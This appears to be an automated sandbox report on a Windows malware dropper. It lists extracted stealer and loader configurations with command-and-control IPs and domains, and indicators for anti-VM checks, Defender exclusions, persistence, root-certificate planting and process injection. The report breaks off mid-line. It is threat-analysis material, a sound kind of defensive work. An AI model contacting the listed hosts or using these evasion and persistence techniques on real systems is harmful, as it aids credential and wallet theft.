Analysis
-
max time kernel
121s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
20-05-2024 14:40
Behavioral task
behavioral1
Sample
a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral2
Sample
a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exe
Resource
win11-20240426-en
General
-
Target
a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exe
-
Size
1.5MB
-
MD5
c44794b201b7dc97cc87305870125bda
-
SHA1
2439e52cfd331a39257cd1fb3147d4fbcd8e0b89
-
SHA256
a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99
-
SHA512
4e0f023cb7614a4a3e7f481edd66d4ceb4fc219eb50026375f5c9b0aa321094df06271dac9636338aa96a3ec0f605e5c10f75f143591c66ed7c9e176d3441f27
-
SSDEEP
24576:Zlc31dGja+3smwC6x6ILzp5lw74KGgnIuszQOgGPUQjlxPNaSP6nPZI5zNq6nVdE:8/Gja+3sGE+Igu2OjbPNCqqV
Malware Config
Extracted
amadey
4.20
18befc
http://5.42.96.141
-
install_dir
908f070dff
-
install_file
explorku.exe
-
strings_key
b25a9385246248a95c600f9a061438e1
-
url_paths
/go34ko8/index.php
Extracted
amadey
4.20
c767c0
http://5.42.96.7
-
install_dir
7af68cdb52
-
install_file
axplons.exe
-
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
-
url_paths
/zamo7h/index.php
Extracted
risepro
147.45.47.126:58709
Extracted
redline
1
185.215.113.67:26260
Extracted
redline
@LOGSCLOUDYT_BOT
185.172.128.33:8970
Extracted
stealc
zzvv
http://23.88.106.134
-
url_path
/c73eed764cc59dcb.php
Extracted
lumma
https://civilianurinedtsraov.shop/api
https://museumtespaceorsp.shop/api
https://buttockdecarderwiso.shop/api
https://averageaattractiionsl.shop/api
https://femininiespywageg.shop/api
https://employhabragaomlsp.shop/api
https://stalfbaclcalorieeis.shop/api
https://roomabolishsnifftwk.shop/api
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe family_redline behavioral1/memory/4544-138-0x0000000000BB0000-0x0000000000C02000-memory.dmp family_redline C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe family_redline behavioral1/memory/4020-163-0x00000000008D0000-0x0000000000922000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
Processes:
a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exeexplorku.exe67b2db9f7c.exeexplorku.exeexplorku.exeamers.exeaxplons.exe3e5db9007c.exeaxplons.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 67b2db9f7c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amers.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3e5db9007c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepid process 5456 powershell.exe 4340 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
explorku.exeamers.exeaxplons.exeexplorku.exea6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exeexplorku.exe67b2db9f7c.exe3e5db9007c.exeaxplons.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amers.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amers.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 67b2db9f7c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 67b2db9f7c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3e5db9007c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3e5db9007c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
amers.exeaxplons.exeRegAsm.exeinstall.exeNewoff.exea6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exeexplorku.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation amers.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation axplons.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation install.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Newoff.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation explorku.exe -
Executes dropped EXE 38 IoCs
Processes:
explorku.exeexplorku.exeamers.exeaxplons.exe67b2db9f7c.exealex.exeredline1.exesvhoost.exeOne.exeinstall.exe3e5db9007c.exeswizzzz.exeaxplons.exeexplorku.exefile300un.exeGameService.exeGameService.exeGameService.exegold.exeGameService.exeGameService.exeNewoff.exelumma1234.exeGameSyncLink.exeFirstZ.exe158969.exeGameService.exeGameService.exeGameService.exeGameService.exeGameService.exePiercingNetLink.exeGameService.exeGameService.exeGameService.exeGameService.exeGameSyncLinks.exe863401.exepid process 4924 explorku.exe 4540 explorku.exe 4476 amers.exe 1780 axplons.exe 5012 67b2db9f7c.exe 3640 alex.exe 4544 redline1.exe 4020 svhoost.exe 684 One.exe 4980 install.exe 2332 3e5db9007c.exe 3796 swizzzz.exe 440 axplons.exe 4072 explorku.exe 5184 file300un.exe 5240 GameService.exe 5448 GameService.exe 5524 GameService.exe 5752 gold.exe 5916 GameService.exe 5940 GameService.exe 6136 Newoff.exe 5460 lumma1234.exe 5472 GameSyncLink.exe 5248 FirstZ.exe 1648 158969.exe 980 GameService.exe 1592 GameService.exe 2620 GameService.exe 1744 GameService.exe 5116 GameService.exe 5380 PiercingNetLink.exe 4880 GameService.exe 3116 GameService.exe 4392 GameService.exe 4360 GameService.exe 5920 GameSyncLinks.exe 5908 863401.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
axplons.exe3e5db9007c.exeaxplons.exeamers.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine 3e5db9007c.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Wine amers.exe -
Loads dropped DLL 3 IoCs
Processes:
158969.exeRegAsm.exepid process 1648 158969.exe 1196 RegAsm.exe 1196 RegAsm.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/656-0-0x0000000000ED0000-0x00000000013B5000-memory.dmp themida behavioral1/memory/656-2-0x0000000000ED0000-0x00000000013B5000-memory.dmp themida behavioral1/memory/656-3-0x0000000000ED0000-0x00000000013B5000-memory.dmp themida behavioral1/memory/656-1-0x0000000000ED0000-0x00000000013B5000-memory.dmp themida behavioral1/memory/656-4-0x0000000000ED0000-0x00000000013B5000-memory.dmp themida behavioral1/memory/656-5-0x0000000000ED0000-0x00000000013B5000-memory.dmp themida behavioral1/memory/656-6-0x0000000000ED0000-0x00000000013B5000-memory.dmp themida behavioral1/memory/656-7-0x0000000000ED0000-0x00000000013B5000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe themida behavioral1/memory/656-18-0x0000000000ED0000-0x00000000013B5000-memory.dmp themida behavioral1/memory/656-20-0x0000000000ED0000-0x00000000013B5000-memory.dmp themida behavioral1/memory/4924-21-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4924-22-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4924-23-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4924-24-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4924-25-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4924-27-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4924-26-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4924-28-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4540-30-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4540-31-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4540-32-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4540-34-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4540-35-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4540-33-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4540-36-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4540-37-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4924-38-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4924-41-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4924-64-0x00000000007B0000-0x0000000000C95000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\1000014001\67b2db9f7c.exe themida behavioral1/memory/5012-92-0x0000000000190000-0x0000000000811000-memory.dmp themida behavioral1/memory/5012-93-0x0000000000190000-0x0000000000811000-memory.dmp themida behavioral1/memory/5012-96-0x0000000000190000-0x0000000000811000-memory.dmp themida behavioral1/memory/5012-94-0x0000000000190000-0x0000000000811000-memory.dmp themida behavioral1/memory/5012-95-0x0000000000190000-0x0000000000811000-memory.dmp themida behavioral1/memory/5012-99-0x0000000000190000-0x0000000000811000-memory.dmp themida behavioral1/memory/5012-100-0x0000000000190000-0x0000000000811000-memory.dmp themida behavioral1/memory/5012-98-0x0000000000190000-0x0000000000811000-memory.dmp themida behavioral1/memory/5012-97-0x0000000000190000-0x0000000000811000-memory.dmp themida behavioral1/memory/4924-119-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/5012-252-0x0000000000190000-0x0000000000811000-memory.dmp themida behavioral1/memory/4924-285-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4072-299-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4072-300-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4072-302-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4072-298-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4072-304-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4072-303-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4072-301-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/4072-322-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/1196-581-0x00000000007B0000-0x0000000000C95000-memory.dmp themida behavioral1/memory/1196-594-0x00000000007B0000-0x0000000000C95000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
explorku.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\67b2db9f7c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000014001\\67b2db9f7c.exe" explorku.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exeexplorku.exeexplorku.exe67b2db9f7c.exeexplorku.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 67b2db9f7c.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
amers.exeaxplons.exe3e5db9007c.exeaxplons.exepid process 4476 amers.exe 1780 axplons.exe 2332 3e5db9007c.exe 440 axplons.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
alex.exeswizzzz.exegold.exelumma1234.exedescription pid process target process PID 3640 set thread context of 1468 3640 alex.exe RegAsm.exe PID 3796 set thread context of 1196 3796 swizzzz.exe RegAsm.exe PID 5752 set thread context of 5872 5752 gold.exe RegAsm.exe PID 5460 set thread context of 5844 5460 lumma1234.exe RegAsm.exe -
Drops file in Program Files directory 14 IoCs
Processes:
install.exedescription ioc process File created C:\Program Files (x86)\GameSyncLink\installg.bat install.exe File created C:\Program Files (x86)\GameSyncLink\installm.bat install.exe File created C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installc.bat install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installg.bat install.exe File created C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe install.exe File created C:\Program Files (x86)\GameSyncLink\installc.bat install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installm.bat install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameService.exe install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe install.exe File created C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe install.exe File created C:\Program Files (x86)\GameSyncLink\GameService.exe install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe install.exe -
Drops file in Windows directory 2 IoCs
Processes:
a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exeamers.exedescription ioc process File created C:\Windows\Tasks\explorku.job a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exe File created C:\Windows\Tasks\axplons.job amers.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 440 sc.exe 1168 sc.exe 3616 sc.exe 3884 sc.exe 3460 sc.exe 1160 sc.exe 5352 sc.exe 4352 sc.exe 5340 sc.exe 1204 sc.exe 3528 sc.exe 5460 sc.exe 5824 sc.exe 3284 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Processes:
svhoost.exeredline1.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 svhoost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 redline1.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00460039003500370041003700390044002d0033003300450032002d0034003700420038002d0042003200350037002d003400420038003500340041003300380046003700430030007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 redline1.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 svhoost.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
amers.exeaxplons.exe3e5db9007c.exeRegAsm.exeaxplons.exesvhoost.exeOne.exepid process 4476 amers.exe 4476 amers.exe 1780 axplons.exe 1780 axplons.exe 2332 3e5db9007c.exe 2332 3e5db9007c.exe 1196 RegAsm.exe 1196 RegAsm.exe 440 axplons.exe 440 axplons.exe 1196 RegAsm.exe 1196 RegAsm.exe 1196 RegAsm.exe 1196 RegAsm.exe 1196 RegAsm.exe 1196 RegAsm.exe 1196 RegAsm.exe 1196 RegAsm.exe 1196 RegAsm.exe 1196 RegAsm.exe 1196 RegAsm.exe 1196 RegAsm.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 684 One.exe 684 One.exe 684 One.exe 684 One.exe 684 One.exe 684 One.exe 684 One.exe 684 One.exe 684 One.exe 684 One.exe 684 One.exe 684 One.exe 684 One.exe 684 One.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe 4020 svhoost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 660 -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
One.exesvhoost.exeredline1.exeRegAsm.exe863401.exepowershell.exedescription pid process Token: SeDebugPrivilege 684 One.exe Token: SeBackupPrivilege 684 One.exe Token: SeSecurityPrivilege 684 One.exe Token: SeSecurityPrivilege 684 One.exe Token: SeSecurityPrivilege 684 One.exe Token: SeSecurityPrivilege 684 One.exe Token: SeDebugPrivilege 4020 svhoost.exe Token: SeDebugPrivilege 4544 redline1.exe Token: SeDebugPrivilege 1468 RegAsm.exe Token: SeLockMemoryPrivilege 5908 863401.exe Token: SeDebugPrivilege 5456 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exeamers.exe863401.exepid process 656 a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exe 4476 amers.exe 5908 863401.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exeexplorku.exeamers.exeaxplons.exealex.exeRegAsm.exeinstall.exeswizzzz.execmd.exedescription pid process target process PID 656 wrote to memory of 4924 656 a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exe explorku.exe PID 656 wrote to memory of 4924 656 a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exe explorku.exe PID 656 wrote to memory of 4924 656 a6fb33bc7d6387111cb9d4507aaa159332d68baadffb9c82cde7993f646a6d99.exe explorku.exe PID 4924 wrote to memory of 3536 4924 explorku.exe explorku.exe PID 4924 wrote to memory of 3536 4924 explorku.exe explorku.exe PID 4924 wrote to memory of 3536 4924 explorku.exe explorku.exe PID 4924 wrote to memory of 4476 4924 explorku.exe amers.exe PID 4924 wrote to memory of 4476 4924 explorku.exe amers.exe PID 4924 wrote to memory of 4476 4924 explorku.exe amers.exe PID 4476 wrote to memory of 1780 4476 amers.exe axplons.exe PID 4476 wrote to memory of 1780 4476 amers.exe axplons.exe PID 4476 wrote to memory of 1780 4476 amers.exe axplons.exe PID 4924 wrote to memory of 5012 4924 explorku.exe 67b2db9f7c.exe PID 4924 wrote to memory of 5012 4924 explorku.exe 67b2db9f7c.exe PID 4924 wrote to memory of 5012 4924 explorku.exe 67b2db9f7c.exe PID 1780 wrote to memory of 3640 1780 axplons.exe alex.exe PID 1780 wrote to memory of 3640 1780 axplons.exe alex.exe PID 1780 wrote to memory of 3640 1780 axplons.exe alex.exe PID 3640 wrote to memory of 4956 3640 alex.exe RegAsm.exe PID 3640 wrote to memory of 4956 3640 alex.exe RegAsm.exe PID 3640 wrote to memory of 4956 3640 alex.exe RegAsm.exe PID 3640 wrote to memory of 1468 3640 alex.exe RegAsm.exe PID 3640 wrote to memory of 1468 3640 alex.exe RegAsm.exe PID 3640 wrote to memory of 1468 3640 alex.exe RegAsm.exe PID 3640 wrote to memory of 1468 3640 alex.exe RegAsm.exe PID 3640 wrote to memory of 1468 3640 alex.exe RegAsm.exe PID 3640 wrote to memory of 1468 3640 alex.exe RegAsm.exe PID 3640 wrote to memory of 1468 3640 alex.exe RegAsm.exe PID 3640 wrote to memory of 1468 3640 alex.exe RegAsm.exe PID 1780 wrote to memory of 4544 1780 axplons.exe redline1.exe PID 1780 wrote to memory of 4544 1780 axplons.exe redline1.exe PID 1780 wrote to memory of 4544 1780 axplons.exe redline1.exe PID 1468 wrote to memory of 4020 1468 RegAsm.exe svhoost.exe PID 1468 wrote to memory of 4020 1468 RegAsm.exe svhoost.exe PID 1468 wrote to memory of 4020 1468 RegAsm.exe svhoost.exe PID 1468 wrote to memory of 684 1468 RegAsm.exe One.exe PID 1468 wrote to memory of 684 1468 RegAsm.exe One.exe PID 1780 wrote to memory of 4980 1780 axplons.exe install.exe PID 1780 wrote to memory of 4980 